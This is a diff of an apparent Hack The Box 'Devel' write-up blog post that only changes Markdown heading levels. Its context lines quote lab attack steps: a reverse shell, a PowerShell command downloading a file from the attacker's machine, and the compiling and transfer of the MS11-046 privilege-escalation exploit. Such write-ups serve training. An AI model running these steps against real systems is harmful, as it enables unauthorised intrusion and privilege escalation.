--- a/_posts/2021-01-06-htb-devel.md
+++ b/_posts/2021-01-06-htb-devel.md
@@ -116,7 +116,7 @@ Because of the folder name `aspnet_client`, I looked for _"asp net reverse shell
 
 ![reverse shell](https://amirr0r.github.io/assets/img/htb/machines/windows/easy/devel/reverse-shell.png)
 
-## User
+### User
 
 Currently we are `iis apppool\web`:
 
@@ -169,13 +169,13 @@ There are two other users that we are interested to:
 - **babis**
 - **Administrator**
 
-### `systeminfo`
+#### `systeminfo`
 
 ![systeminfo](https://amirr0r.github.io/assets/img/htb/machines/windows/easy/devel/systeminfo.png)
 
 The target machine is **Microsoft Windows 7 Entreprise** server (version &rarr; 6.1.7600) with an **x86** architecture (32 bits). 
 
-### Download and execute `winPEAS.exe`
+#### Download and execute `winPEAS.exe`
 
 Let's go to a word writable directory (`C:\Windows\System32\spool\drivers\color`) and try to run [winPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
@@ -196,7 +196,7 @@ c:> powershell -command "(new-object System.Net.WebClient).DownloadFile('http://
 
 ![alternative to wget](https://amirr0r.github.io/assets/img/htb/machines/windows/easy/devel/wget.png)
 
-### Looking for exploits
+#### Looking for exploits
 
 Unfortunately, I didn't get any output after executing `winPEAS.exe` so I directly looked for exploits on **Microsoft Windows 7**:
 
@@ -204,7 +204,7 @@ Unfortunately, I didn't get any output after executing `winPEAS.exe` so I direct
 
 ![MS11-046](https://amirr0r.github.io/assets/img/htb/machines/windows/easy/devel/exploitDB.png)
 
-### Compiling exploits
+#### Compiling exploits
 
 1. Getting exploit based on the **EDB-ID** (**E**xploit **D**ataBase **ID**entifier):
 
@@ -226,7 +226,7 @@ Copied to: /root/htb/machines/Windows/Devel/40564.c
 $ i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
 ```
 
-## Privesc (system)
+### Privesc (system)
 
 Transfer `exploit.exe`:
 - (Attacker's machine) run HTTP Server: `python3 -m http.server`
